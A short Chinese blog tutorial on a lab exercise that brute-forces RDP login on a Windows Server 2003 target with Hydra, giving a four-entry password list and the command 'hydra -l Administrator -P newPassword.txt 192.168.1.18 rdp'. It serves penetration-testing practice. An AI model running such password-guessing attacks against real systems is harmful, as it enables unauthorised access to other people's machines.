Windows下hydra(海德拉/九头蛇)暴力猜解RDP的简单渗透实践

attscker machine:windows10

靶机:windoes server 2003

环境:网络可达 && mstsc开启

hydra字典:

123456

123admin

admin123

123Com(正确密码)

进入hydra目录,字典与hydar.exe同一目录文件夹。

爆破命令执行:

hydra -l [username/用户名] -P [字典文件名] [靶机ip] [协议名]

用户名已知,即:

hydra -l Administrator -P newPassword.txt 192.168.1.18 rdp

结果如图:

相关推荐
獨枭5 小时前
Windows 10/11 把更新彻底禁用
windows
天才程序YUAN5 小时前
从零开始、保留 Windows 数据、安装Ubuntu 22.04 LTS双系统
linux·windows·ubuntu
HCIE考证研究所6 小时前
最全网安证书大盘点,真不是什么都适合你
网络安全·网络工程师·cisp
0***h9426 小时前
Windows 11 如何配置node.js
windows·node.js
n***63277 小时前
DeepSeek API 调用 - Spring Boot 实现
windows·spring boot·后端
漏洞文库-Web安全8 小时前
CTFHub-Web-信息泄露
安全·web安全·网络安全·web·ctf·信息泄露·ctfhub
I***26158 小时前
Windows环境下安装Redis并设置Redis开机自启
数据库·windows·redis
localbob9 小时前
Windows 11跳过微软账户登录的三种方法(支持家庭版和专业版) Windows 11 跳过微软账户、本地账户安装、OOBE命令、注册表修改、bypassnro
windows·microsoft·win11·win11本地账户·windows添加本地账户·windows跳过微软
6***v4179 小时前
windows手动配置IP地址与DNS服务器以及netsh端口转发
服务器·windows·tcp/ip